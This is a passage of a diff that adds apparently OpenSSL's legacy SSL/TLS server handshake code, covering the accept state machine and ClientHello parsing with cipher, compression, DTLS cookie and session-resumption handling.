+             * the server certificate contains the server's public key for
+             * key exchange.
+             */
+            if (0
+                /*
+                 * PSK: send ServerKeyExchange if PSK identity hint if
+                 * provided
+                 */
+#ifndef OPENSSL_NO_PSK
+                || ((alg_k & SSL_kPSK) && s->ctx->psk_identity_hint)
+#endif
+#ifndef OPENSSL_NO_SRP
+                /* SRP: send ServerKeyExchange */
+                || (alg_k & SSL_kSRP)
+#endif
+                || (alg_k & SSL_kEDH)
+                || (alg_k & SSL_kEECDH)
+                || ((alg_k & SSL_kRSA)
+                    && (s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL
+                        || (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher)
+                            && EVP_PKEY_size(s->cert->pkeys
+                                             [SSL_PKEY_RSA_ENC].privatekey) *
+                            8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher)
+                        )
+                    )
+                )
+                ) {
+                ret = ssl3_send_server_key_exchange(s);
+                if (ret <= 0)
+                    goto end;
+            } else
+                skip = 1;
+
+            s->state = SSL3_ST_SW_CERT_REQ_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_CERT_REQ_A:
+        case SSL3_ST_SW_CERT_REQ_B:
+            if (                /* don't request cert unless asked for it: */
+                   !(s->verify_mode & SSL_VERIFY_PEER) ||
+                   /*
+                    * if SSL_VERIFY_CLIENT_ONCE is set, don't request cert
+                    * during re-negotiation:
+                    */
+                   ((s->session->peer != NULL) &&
+                    (s->verify_mode & SSL_VERIFY_CLIENT_ONCE)) ||
+                   /*
+                    * never request cert in anonymous ciphersuites (see
+                    * section "Certificate request" in SSL 3 drafts and in
+                    * RFC 2246):
+                    */
+                   ((s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL) &&
+                    /*
+                     * ... except when the application insists on
+                     * verification (against the specs, but s3_clnt.c accepts
+                     * this for SSL 3)
+                     */
+                    !(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT)) ||
+                   /*
+                    * never request cert in Kerberos ciphersuites
+                    */
+                   (s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5) ||
+                   /* don't request certificate for SRP auth */
+                   (s->s3->tmp.new_cipher->algorithm_auth & SSL_aSRP)
+                   /*
+                    * With normal PSK Certificates and Certificate Requests
+                    * are omitted
+                    */
+                   || (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)) {
+                /* no cert request */
+                skip = 1;
+                s->s3->tmp.cert_request = 0;
+                s->state = SSL3_ST_SW_SRVR_DONE_A;
+                if (s->s3->handshake_buffer)
+                    if (!ssl3_digest_cached_records(s))
+                        return -1;
+            } else {
+                s->s3->tmp.cert_request = 1;
+                ret = ssl3_send_certificate_request(s);
+                if (ret <= 0)
+                    goto end;
+#ifndef NETSCAPE_HANG_BUG
+                s->state = SSL3_ST_SW_SRVR_DONE_A;
+#else
+                s->state = SSL3_ST_SW_FLUSH;
+                s->s3->tmp.next_state = SSL3_ST_SR_CERT_A;
+#endif
+                s->init_num = 0;
+            }
+            break;
+
+        case SSL3_ST_SW_SRVR_DONE_A:
+        case SSL3_ST_SW_SRVR_DONE_B:
+            ret = ssl3_send_server_done(s);
+            if (ret <= 0)
+                goto end;
+            s->s3->tmp.next_state = SSL3_ST_SR_CERT_A;
+            s->state = SSL3_ST_SW_FLUSH;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_FLUSH:
+
+            /*
+             * This code originally checked to see if any data was pending
+             * using BIO_CTRL_INFO and then flushed. This caused problems as
+             * documented in PR#1939. The proposed fix doesn't completely
+             * resolve this issue as buggy implementations of
+             * BIO_CTRL_PENDING still exist. So instead we just flush
+             * unconditionally.
+             */
+
+            s->rwstate = SSL_WRITING;
+            if (BIO_flush(s->wbio) <= 0) {
+                ret = -1;
+                goto end;
+            }
+            s->rwstate = SSL_NOTHING;
+
+            s->state = s->s3->tmp.next_state;
+            break;
+
+        case SSL3_ST_SR_CERT_A:
+        case SSL3_ST_SR_CERT_B:
+            if (s->s3->tmp.cert_request) {
+                ret = ssl3_get_client_certificate(s);
+                if (ret <= 0)
+                    goto end;
+            }
+            s->init_num = 0;
+            s->state = SSL3_ST_SR_KEY_EXCH_A;
+            break;
+
+        case SSL3_ST_SR_KEY_EXCH_A:
+        case SSL3_ST_SR_KEY_EXCH_B:
+            ret = ssl3_get_client_key_exchange(s);
+            if (ret <= 0)
+                goto end;
+            if (ret == 2) {
+                /*
+                 * For the ECDH ciphersuites when the client sends its ECDH
+                 * pub key in a certificate, the CertificateVerify message is
+                 * not sent. Also for GOST ciphersuites when the client uses
+                 * its key from the certificate for key exchange.
+                 */
+#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
+                s->state = SSL3_ST_SR_FINISHED_A;
+#else
+                if (s->s3->next_proto_neg_seen)
+                    s->state = SSL3_ST_SR_NEXT_PROTO_A;
+                else
+                    s->state = SSL3_ST_SR_FINISHED_A;
+#endif
+                s->init_num = 0;
+            } else if (SSL_USE_SIGALGS(s)) {
+                s->state = SSL3_ST_SR_CERT_VRFY_A;
+                s->init_num = 0;
+                if (!s->session->peer)
+                    break;
+                /*
+                 * For sigalgs freeze the handshake buffer at this point and
+                 * digest cached records.
+                 */
+                if (!s->s3->handshake_buffer) {
+                    SSLerr(SSL_F_SSL3_ACCEPT, ERR_R_INTERNAL_ERROR);
+                    return -1;
+                }
+                s->s3->flags |= TLS1_FLAGS_KEEP_HANDSHAKE;
+                if (!ssl3_digest_cached_records(s))
+                    return -1;
+            } else {
+                int offset = 0;
+                int dgst_num;
+
+                s->state = SSL3_ST_SR_CERT_VRFY_A;
+                s->init_num = 0;
+
+                /*
+                 * We need to get hashes here so if there is a client cert,
+                 * it can be verified FIXME - digest processing for
+                 * CertificateVerify should be generalized. But it is next
+                 * step
+                 */
+                if (s->s3->handshake_buffer)
+                    if (!ssl3_digest_cached_records(s))
+                        return -1;
+                for (dgst_num = 0; dgst_num < SSL_MAX_DIGEST; dgst_num++)
+                    if (s->s3->handshake_dgst[dgst_num]) {
+                        int dgst_size;
+
+                        s->method->ssl3_enc->cert_verify_mac(s,
+                                                             EVP_MD_CTX_type
+                                                             (s->
+                                                              s3->handshake_dgst
+                                                              [dgst_num]),
+                                                             &(s->s3->
+                                                               tmp.cert_verify_md
+                                                               [offset]));
+                        dgst_size =
+                            EVP_MD_CTX_size(s->s3->handshake_dgst[dgst_num]);
+                        if (dgst_size < 0) {
+                            ret = -1;
+                            goto end;
+                        }
+                        offset += dgst_size;
+                    }
+            }
+            break;
+
+        case SSL3_ST_SR_CERT_VRFY_A:
+        case SSL3_ST_SR_CERT_VRFY_B:
+            /*
+             * This *should* be the first time we enable CCS, but be
+             * extra careful about surrounding code changes. We need
+             * to set this here because we don't know if we're
+             * expecting a CertificateVerify or not.
+             */
+            if (!s->s3->change_cipher_spec)
+                s->s3->flags |= SSL3_FLAGS_CCS_OK;
+            /* we should decide if we expected this one */
+            ret = ssl3_get_cert_verify(s);
+            if (ret <= 0)
+                goto end;
+
+#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
+            s->state = SSL3_ST_SR_FINISHED_A;
+#else
+            if (s->s3->next_proto_neg_seen)
+                s->state = SSL3_ST_SR_NEXT_PROTO_A;
+            else
+                s->state = SSL3_ST_SR_FINISHED_A;
+#endif
+            s->init_num = 0;
+            break;
+
+#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
+        case SSL3_ST_SR_NEXT_PROTO_A:
+        case SSL3_ST_SR_NEXT_PROTO_B:
+            /*
+             * Enable CCS for resumed handshakes with NPN.
+             * In a full handshake with NPN, we end up here through
+             * SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
+             * already set. Receiving a CCS clears the flag, so make
+             * sure not to re-enable it to ban duplicates.
+             * s->s3->change_cipher_spec is set when a CCS is
+             * processed in s3_pkt.c, and remains set until
+             * the client's Finished message is read.
+             */
+            if (!s->s3->change_cipher_spec)
+                s->s3->flags |= SSL3_FLAGS_CCS_OK;
+
+            ret = ssl3_get_next_proto(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            s->state = SSL3_ST_SR_FINISHED_A;
+            break;
+#endif
+
+        case SSL3_ST_SR_FINISHED_A:
+        case SSL3_ST_SR_FINISHED_B:
+            /*
+             * Enable CCS for resumed handshakes without NPN.
+             * In a full handshake, we end up here through
+             * SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
+             * already set. Receiving a CCS clears the flag, so make
+             * sure not to re-enable it to ban duplicates.
+             * s->s3->change_cipher_spec is set when a CCS is
+             * processed in s3_pkt.c, and remains set until
+             * the client's Finished message is read.
+             */
+            if (!s->s3->change_cipher_spec)
+                s->s3->flags |= SSL3_FLAGS_CCS_OK;
+            ret = ssl3_get_finished(s, SSL3_ST_SR_FINISHED_A,
+                                    SSL3_ST_SR_FINISHED_B);
+            if (ret <= 0)
+                goto end;
+            if (s->hit)
+                s->state = SSL_ST_OK;
+#ifndef OPENSSL_NO_TLSEXT
+            else if (s->tlsext_ticket_expected)
+                s->state = SSL3_ST_SW_SESSION_TICKET_A;
+#endif
+            else
+                s->state = SSL3_ST_SW_CHANGE_A;
+            s->init_num = 0;
+            break;
+
+#ifndef OPENSSL_NO_TLSEXT
+        case SSL3_ST_SW_SESSION_TICKET_A:
+        case SSL3_ST_SW_SESSION_TICKET_B:
+            ret = ssl3_send_newsession_ticket(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_SW_CHANGE_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_CERT_STATUS_A:
+        case SSL3_ST_SW_CERT_STATUS_B:
+            ret = ssl3_send_cert_status(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_SW_KEY_EXCH_A;
+            s->init_num = 0;
+            break;
+
+#endif
+
+        case SSL3_ST_SW_CHANGE_A:
+        case SSL3_ST_SW_CHANGE_B:
+
+            s->session->cipher = s->s3->tmp.new_cipher;
+            if (!s->method->ssl3_enc->setup_key_block(s)) {
+                ret = -1;
+                goto end;
+            }
+
+            ret = ssl3_send_change_cipher_spec(s,
+                                               SSL3_ST_SW_CHANGE_A,
+                                               SSL3_ST_SW_CHANGE_B);
+
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_SW_FINISHED_A;
+            s->init_num = 0;
+
+            if (!s->method->ssl3_enc->change_cipher_state(s,
+                                                          SSL3_CHANGE_CIPHER_SERVER_WRITE))
+            {
+                ret = -1;
+                goto end;
+            }
+
+            break;
+
+        case SSL3_ST_SW_FINISHED_A:
+        case SSL3_ST_SW_FINISHED_B:
+            ret = ssl3_send_finished(s,
+                                     SSL3_ST_SW_FINISHED_A,
+                                     SSL3_ST_SW_FINISHED_B,
+                                     s->method->
+                                     ssl3_enc->server_finished_label,
+                                     s->method->
+                                     ssl3_enc->server_finished_label_len);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_SW_FLUSH;
+            if (s->hit) {
+#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
+                s->s3->tmp.next_state = SSL3_ST_SR_FINISHED_A;
+#else
+                if (s->s3->next_proto_neg_seen) {
+                    s->s3->tmp.next_state = SSL3_ST_SR_NEXT_PROTO_A;
+                } else
+                    s->s3->tmp.next_state = SSL3_ST_SR_FINISHED_A;
+#endif
+            } else
+                s->s3->tmp.next_state = SSL_ST_OK;
+            s->init_num = 0;
+            break;
+
+        case SSL_ST_OK:
+            /* clean a few things up */
+            ssl3_cleanup_key_block(s);
+
+            BUF_MEM_free(s->init_buf);
+            s->init_buf = NULL;
+
+            /* remove buffering on output */
+            ssl_free_wbio_buffer(s);
+
+            s->init_num = 0;
+
+            if (s->renegotiate == 2) { /* skipped if we just sent a
+                                        * HelloRequest */
+                s->renegotiate = 0;
+                s->new_session = 0;
+
+                ssl_update_cache(s, SSL_SESS_CACHE_SERVER);
+
+                s->ctx->stats.sess_accept_good++;
+                /* s->server=1; */
+                s->handshake_func = ssl3_accept;
+
+                if (cb != NULL)
+                    cb(s, SSL_CB_HANDSHAKE_DONE, 1);
+            }
+
+            ret = 1;
+            goto end;
+            /* break; */
+
+        default:
+            SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_UNKNOWN_STATE);
+            ret = -1;
+            goto end;
+            /* break; */
+        }
+
+        if (!s->s3->tmp.reuse_message && !skip) {
+            if (s->debug) {
+                if ((ret = BIO_flush(s->wbio)) <= 0)
+                    goto end;
+            }
+
+            if ((cb != NULL) && (s->state != state)) {
+                new_state = s->state;
+                s->state = state;
+                cb(s, SSL_CB_ACCEPT_LOOP, 1);
+                s->state = new_state;
+            }
+        }
+        skip = 0;
+    }
+ end:
+    /* BIO_flush(s->wbio); */
+
+    s->in_handshake--;
+    if (cb != NULL)
+        cb(s, SSL_CB_ACCEPT_EXIT, ret);
+    return (ret);
+}
+
+int ssl3_send_hello_request(SSL *s)
+{
+
+    if (s->state == SSL3_ST_SW_HELLO_REQ_A) {
+        ssl_set_handshake_header(s, SSL3_MT_HELLO_REQUEST, 0);
+        s->state = SSL3_ST_SW_HELLO_REQ_B;
+    }
+
+    /* SSL3_ST_SW_HELLO_REQ_B */
+    return ssl_do_write(s);
+}
+
+int ssl3_get_client_hello(SSL *s)
+{
+    int i, j, ok, al = SSL_AD_INTERNAL_ERROR, ret = -1;
+    unsigned int cookie_len;
+    long n;
+    unsigned long id;
+    unsigned char *p, *d;
+    SSL_CIPHER *c;
+#ifndef OPENSSL_NO_COMP
+    unsigned char *q;
+    SSL_COMP *comp = NULL;
+#endif
+    STACK_OF(SSL_CIPHER) *ciphers = NULL;
+
+    if (s->state == SSL3_ST_SR_CLNT_HELLO_C && !s->first_packet)
+        goto retry_cert;
+
+    /*
+     * We do this so that we will respond with our native type. If we are
+     * TLSv1 and we get SSLv3, we will respond with TLSv1, This down
+     * switching should be handled by a different method. If we are SSLv3, we
+     * will respond with SSLv3, even if prompted with TLSv1.
+     */
+    if (s->state == SSL3_ST_SR_CLNT_HELLO_A) {
+        s->state = SSL3_ST_SR_CLNT_HELLO_B;
+    }
+    s->first_packet = 1;
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_SR_CLNT_HELLO_B,
+                                   SSL3_ST_SR_CLNT_HELLO_C,
+                                   SSL3_MT_CLIENT_HELLO,
+                                   SSL3_RT_MAX_PLAIN_LENGTH, &ok);
+
+    if (!ok)
+        return ((int)n);
+    s->first_packet = 0;
+    d = p = (unsigned char *)s->init_msg;
+
+    /*
+     * use version from inside client hello, not from record header (may
+     * differ: see RFC 2246, Appendix E, second paragraph)
+     */
+    s->client_version = (((int)p[0]) << 8) | (int)p[1];
+    p += 2;
+
+    if (SSL_IS_DTLS(s) ? (s->client_version > s->version &&
+                          s->method->version != DTLS_ANY_VERSION)
+        : (s->client_version < s->version)) {
+        SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_WRONG_VERSION_NUMBER);
+        if ((s->client_version >> 8) == SSL3_VERSION_MAJOR &&
+            !s->enc_write_ctx && !s->write_hash) {
+            /*
+             * similar to ssl3_get_record, send alert using remote version
+             * number
+             */
+            s->version = s->client_version;
+        }
+        al = SSL_AD_PROTOCOL_VERSION;
+        goto f_err;
+    }
+
+    /*
+     * If we require cookies and this ClientHello doesn't contain one, just
+     * return since we do not want to allocate any memory yet. So check
+     * cookie length...
+     */
+    if (SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE) {
+        unsigned int session_length, cookie_length;
+
+        session_length = *(p + SSL3_RANDOM_SIZE);
+        cookie_length = *(p + SSL3_RANDOM_SIZE + session_length + 1);
+
+        if (cookie_length == 0)
+            return 1;
+    }
+
+    /* load the client random */
+    memcpy(s->s3->client_random, p, SSL3_RANDOM_SIZE);
+    p += SSL3_RANDOM_SIZE;
+
+    /* get the session-id */
+    j = *(p++);
+
+    s->hit = 0;
+    /*
+     * Versions before 0.9.7 always allow clients to resume sessions in
+     * renegotiation. 0.9.7 and later allow this by default, but optionally
+     * ignore resumption requests with flag
+     * SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION (it's a new flag rather
+     * than a change to default behavior so that applications relying on this
+     * for security won't even compile against older library versions).
+     * 1.0.1 and later also have a function SSL_renegotiate_abbreviated() to
+     * request renegotiation but not a new session (s->new_session remains
+     * unset): for servers, this essentially just means that the
+     * SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION setting will be ignored.
+     */
+    if ((s->new_session
+         && (s->options & SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION))) {
+        if (!ssl_get_new_session(s, 1))
+            goto err;
+    } else {
+        i = ssl_get_prev_session(s, p, j, d + n);
+        /*
+         * Only resume if the session's version matches the negotiated
+         * version.
+         * RFC 5246 does not provide much useful advice on resumption
+         * with a different protocol version. It doesn't forbid it but
+         * the sanity of such behaviour would be questionable.
+         * In practice, clients do not accept a version mismatch and
+         * will abort the handshake with an error.
+         */
+        if (i == 1 && s->version == s->session->ssl_version) { /* previous
+                                                                * session */
+            s->hit = 1;
+        } else if (i == -1)
+            goto err;
+        else {                  /* i == 0 */
+
+            if (!ssl_get_new_session(s, 1))
+                goto err;
+        }
+    }
+
+    p += j;
+
+    if (SSL_IS_DTLS(s)) {
+        /* cookie stuff */
+        cookie_len = *(p++);
+
+        /*
+         * The ClientHello may contain a cookie even if the
+         * HelloVerify message has not been sent--make sure that it
+         * does not cause an overflow.
+         */
+        if (cookie_len > sizeof(s->d1->rcvd_cookie)) {
+            /* too much data */
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_COOKIE_MISMATCH);
+            goto f_err;
+        }
+
+        /* verify the cookie if appropriate option is set. */
+        if ((SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE) && cookie_len > 0) {
+            memcpy(s->d1->rcvd_cookie, p, cookie_len);
+
+            if (s->ctx->app_verify_cookie_cb != NULL) {
+                if (s->ctx->app_verify_cookie_cb(s, s->d1->rcvd_cookie,
+                                                 cookie_len) == 0) {
+                    al = SSL_AD_HANDSHAKE_FAILURE;
+                    SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
+                           SSL_R_COOKIE_MISMATCH);
+                    goto f_err;
+                }
+                /* else cookie verification succeeded */
+            }
+            /* default verification */
+            else if (memcmp(s->d1->rcvd_cookie, s->d1->cookie,
+                            s->d1->cookie_len) != 0) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_COOKIE_MISMATCH);
+                goto f_err;
+            }
+            /* Set to -2 so if successful we return 2 */
+            ret = -2;
+        }
+
+        p += cookie_len;
+        if (s->method->version == DTLS_ANY_VERSION) {
+            /* Select version to use */
+            if (s->client_version <= DTLS1_2_VERSION &&
+                !(s->options & SSL_OP_NO_DTLSv1_2)) {
+                s->version = DTLS1_2_VERSION;
+                s->method = DTLSv1_2_server_method();
+            } else if (tls1_suiteb(s)) {
+                SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
+                       SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
+                s->version = s->client_version;
+                al = SSL_AD_PROTOCOL_VERSION;
+                goto f_err;
+            } else if (s->client_version <= DTLS1_VERSION &&
+                       !(s->options & SSL_OP_NO_DTLSv1)) {
+                s->version = DTLS1_VERSION;
+                s->method = DTLSv1_server_method();
+            } else {
+                SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
+                       SSL_R_WRONG_VERSION_NUMBER);
+                s->version = s->client_version;
+                al = SSL_AD_PROTOCOL_VERSION;
+                goto f_err;
+            }
+            s->session->ssl_version = s->version;
+        }
+    }
+
+    n2s(p, i);
+    if ((i == 0) && (j != 0)) {
+        /* we need a cipher if we are not resuming a session */
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_NO_CIPHERS_SPECIFIED);
+        goto f_err;
+    }
+    if ((p + i) >= (d + n)) {
+        /* not enough data */
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_LENGTH_MISMATCH);
+        goto f_err;
+    }
+    if ((i > 0) && (ssl_bytes_to_cipher_list(s, p, i, &(ciphers))
+                    == NULL)) {
+        goto err;
+    }
+    p += i;
+
+    /* If it is a hit, check that the cipher is in the list */
+    if ((s->hit) && (i > 0)) {
+        j = 0;
+        id = s->session->cipher->id;
+
+#ifdef CIPHER_DEBUG
+        fprintf(stderr, "client sent %d ciphers\n",
+                sk_SSL_CIPHER_num(ciphers));
+#endif
+        for (i = 0; i < sk_SSL_CIPHER_num(ciphers); i++) {
+            c = sk_SSL_CIPHER_value(ciphers, i);
+#ifdef CIPHER_DEBUG
+            fprintf(stderr, "client [%2d of %2d]:%s\n",
+                    i, sk_SSL_CIPHER_num(ciphers), SSL_CIPHER_get_name(c));
+#endif
+            if (c->id == id) {
+                j = 1;
+                break;
+            }
+        }
+        /*
+         * Disabled because it can be used in a ciphersuite downgrade attack:
+         * CVE-2010-4180.
+         */
+#if 0
+        if (j == 0 && (s->options & SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG)
+            && (sk_SSL_CIPHER_num(ciphers) == 1)) {
+            /*
+             * Special case as client bug workaround: the previously used
+             * cipher may not be in the current list, the client instead
+             * might be trying to continue using a cipher that before wasn't
+             * chosen due to server preferences.  We'll have to reject the
+             * connection if the cipher is not enabled, though.
+             */
+            c = sk_SSL_CIPHER_value(ciphers, 0);
+            if (sk_SSL_CIPHER_find(SSL_get_ciphers(s), c) >= 0) {
+                s->session->cipher = c;
+                j = 1;
+            }
+        }
+#endif
+        if (j == 0) {
+            /*
+             * we need to have the cipher in the cipher list if we are asked
+             * to reuse it
+             */
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
+                   SSL_R_REQUIRED_CIPHER_MISSING);
+            goto f_err;
+        }
+    }
+
+    /* compression */
+    i = *(p++);
+    if ((p + i) > (d + n)) {
+        /* not enough data */
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_LENGTH_MISMATCH);
+        goto f_err;
+    }
+#ifndef OPENSSL_NO_COMP
+    q = p;
+#endif
+    for (j = 0; j < i; j++) {
+        if (p[j] == 0)
+            break;
+    }
+
+    p += i;
+    if (j >= i) {
+        /* no compress */
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_NO_COMPRESSION_SPECIFIED);
+        goto f_err;
+    }
+#ifndef OPENSSL_NO_TLSEXT
+    /* TLS extensions */
+    if (s->version >= SSL3_VERSION) {
+        if (!ssl_parse_clienthello_tlsext(s, &p, d, n)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_PARSE_TLSEXT);
+            goto err;
+        }
+    }
+
+    /*
+     * Check if we want to use external pre-shared secret for this handshake
+     * for not reused session only. We need to generate server_random before
+     * calling tls_session_secret_cb in order to allow SessionTicket
+     * processing to use it in key derivation.
+     */
+    {
+        unsigned char *pos;
+        pos = s->s3->server_random;
+        if (ssl_fill_hello_random(s, 1, pos, SSL3_RANDOM_SIZE) <= 0) {
+            goto f_err;
+        }
+    }
+
+    if (!s->hit && s->version >= TLS1_VERSION && s->tls_session_secret_cb) {
+        SSL_CIPHER *pref_cipher = NULL;
+
+        s->session->master_key_length = sizeof(s->session->master_key);
+        if (s->tls_session_secret_cb(s, s->session->master_key,
+                                     &s->session->master_key_length, ciphers,
+                                     &pref_cipher,
+                                     s->tls_session_secret_cb_arg)) {
+            s->hit = 1;
+            s->session->ciphers = ciphers;
+            s->session->verify_result = X509_V_OK;
+
+            ciphers = NULL;
+
+            /* check if some cipher was preferred by call back */
+            pref_cipher =
+                pref_cipher ? pref_cipher : ssl3_choose_cipher(s,
+                                                               s->
+                                                               session->ciphers,
+                                                               SSL_get_ciphers
+                                                               (s));
+            if (pref_cipher == NULL) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_NO_SHARED_CIPHER);
+                goto f_err;
+            }
+
+            s->session->cipher = pref_cipher;
+
+            if (s->cipher_list)
+                sk_SSL_CIPHER_free(s->cipher_list);
+
+            if (s->cipher_list_by_id)
+                sk_SSL_CIPHER_free(s->cipher_list_by_id);
+
+            s->cipher_list = sk_SSL_CIPHER_dup(s->session->ciphers);
+            s->cipher_list_by_id = sk_SSL_CIPHER_dup(s->session->ciphers);
+        }
+    }
+#endif
+
+    /*
+     * Worst case, we will use the NULL compression, but if we have other
+     * options, we will now look for them.  We have i-1 compression
+     * algorithms from the client, starting at q.
+     */
+    s->s3->tmp.new_compression = NULL;
+#ifndef OPENSSL_NO_COMP
+    /* This only happens if we have a cache hit */
+    if (s->session->compress_meth != 0) {
+        int m, comp_id = s->session->compress_meth;
+        /* Perform sanity checks on resumed compression algorithm */
+        /* Can't disable compression */
+        if (s->options & SSL_OP_NO_COMPRESSION) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
+                   SSL_R_INCONSISTENT_COMPRESSION);
+            goto f_err;
+        }
+        /* Look for resumed compression method */
+        for (m = 0; m < sk_SSL_COMP_num(s->ctx->comp_methods); m++) {
+            comp = sk_SSL_COMP_value(s->ctx->comp_methods, m);
+            if (comp_id == comp->id) {
+                s->s3->tmp.new_compression = comp;
+                break;
+            }
+        }
+        if (s->s3->tmp.new_compression == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
+                   SSL_R_INVALID_COMPRESSION_ALGORITHM);
+            goto f_err;
+        }
+        /* Look for resumed method in compression list */
+        for (m = 0; m < i; m++) {
+            if (q[m] == comp_id)
+                break;
+        }
+        if (m >= i) {
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
+                   SSL_R_REQUIRED_COMPRESSSION_ALGORITHM_MISSING);
+            goto f_err;
+        }
+    } else if (s->hit)
+        comp = NULL;
+    else if (!(s->options & SSL_OP_NO_COMPRESSION) && s->ctx->comp_methods) {
+        /* See if we have a match */
+        int m, nn, o, v, done = 0;
+
+        nn = sk_SSL_COMP_num(s->ctx->comp_methods);
+        for (m = 0; m < nn; m++) {
+            comp = sk_SSL_COMP_value(s->ctx->comp_methods, m);
+            v = comp->id;
+            for (o = 0; o < i; o++) {
+                if (v == q[o]) {
+                    done = 1;
+                    break;
+                }
+            }
+            if (done)
+                break;
+        }
+        if (done)
+            s->s3->tmp.new_compression = comp;
+        else
+            comp = NULL;
+    }
+#else
+    /*
+     * If compression is disabled we'd better not try to resume a session
+     * using compression.
+     */
+    if (s->session->compress_meth != 0) {
+        SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_INCONSISTENT_COMPRESSION);
+        goto f_err;
+    }
+#endif
+
+    /*
+     * Given s->session->ciphers and SSL_get_ciphers, we must pick a cipher
+     */
+
+    if (!s->hit) {
+#ifdef OPENSSL_NO_COMP
+        s->session->compress_meth = 0;
+#else
+        s->session->compress_meth = (comp == NULL) ? 0 : comp->id;
+#endif
+        if (s->session->ciphers != NULL)
+            sk_SSL_CIPHER_free(s->session->ciphers);
+        s->session->ciphers = ciphers;
+        if (ciphers == NULL) {
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_NO_CIPHERS_PASSED);
+            goto f_err;
+        }
+        ciphers = NULL;
+        if (!tls1_set_server_sigalgs(s)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
+            goto err;
+        }
+        /* Let cert callback update server certificates if required */
+ retry_cert:
+        if (s->cert->cert_cb) {
+            int rv = s->cert->cert_cb(s, s->cert->cert_cb_arg);
+            if (rv == 0) {
+                al = SSL_AD_INTERNAL_ERROR;
+                SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CERT_CB_ERROR);
+                goto f_err;
+            }
+            if (rv < 0) {
+                s->rwstate = SSL_X509_LOOKUP;
+                return -1;
+            }
+            s->rwstate = SSL_NOTHING;
+        }
+        c = ssl3_choose_cipher(s, s->session->ciphers, SSL_get_ciphers(s));
+
+        if (c == NULL) {
+            al = SSL_AD_HANDSHAKE_FAILURE;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_NO_SHARED_CIPHER);
+            goto f_err;
+        }
+        s->s3->tmp.new_cipher = c;
+    } else {
+        /* Session-id reuse */
+#ifdef REUSE_CIPHER_BUG
+        STACK_OF(SSL_CIPHER) *sk;
+        SSL_CIPHER *nc = NULL;
+        SSL_CIPHER *ec = NULL;
+
+        if (s->options & SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG) {
+            sk = s->session->ciphers;
+            for (i = 0; i < sk_SSL_CIPHER_num(sk); i++) {
+                c = sk_SSL_CIPHER_value(sk, i);
+                if (c->algorithm_enc & SSL_eNULL)
+                    nc = c;
+                if (SSL_C_IS_EXPORT(c))
+                    ec = c;
+            }
+            if (nc != NULL)
+                s->s3->tmp.new_cipher = nc;
+            else if (ec != NULL)
+                s->s3->tmp.new_cipher = ec;
+            else
+                s->s3->tmp.new_cipher = s->session->cipher;
+        } else
+#endif
+            s->s3->tmp.new_cipher = s->session->cipher;
+    }
+
